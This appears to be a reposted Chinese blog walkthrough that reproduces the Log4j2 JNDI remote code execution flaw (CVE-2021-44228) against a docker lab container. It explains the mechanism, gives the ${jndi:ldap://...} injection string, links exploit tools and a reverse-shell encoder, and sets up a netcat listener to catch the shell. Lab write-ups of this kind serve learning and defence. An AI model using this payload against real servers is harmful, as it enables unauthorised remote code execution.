Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)

参考链接:https://blog.csdn.net/hilaryfrank/article/details/121920264

基础知识

JNDI

Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第1张图片

漏洞攻击原理

原理概述

因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:9999/Test}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第2张图片

复现环境

centos7(docker依赖环境),kali2019

环境搭建

1.使用 docker 拉取漏洞镜像

docker pull vulfocus/log4j2-rce-2021-12-09:latest

Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第3张图片
2.查看漏洞镜像并开启环境

docker images

在这里插入图片描述

docker run -d -P vulfocus/log4j2-rce-2021-12-09

在这里插入图片描述

docker ps -a

在这里插入图片描述
3.访问漏洞环境,环境搭建完成
http://192.168.124.139:49153
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第4张图片

漏洞复现

1.Kali开启ldap和rmi服务
工具地址:

https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools

然后使用如下网址来加密反弹shell命令
加密网址:
https://www.jackson-t.ca/runtime-exec-payloads.html
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第5张图片
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第6张图片
2.Kali监听端口

nc -lvvp 9999

反弹shell

Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第7张图片
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)_第8张图片
成功反弹shell.
参考链接:https://blog.csdn.net/sunjikui1255326447/article/details/121865566

你可能感兴趣的:(CVE复现,docker,apache,安全)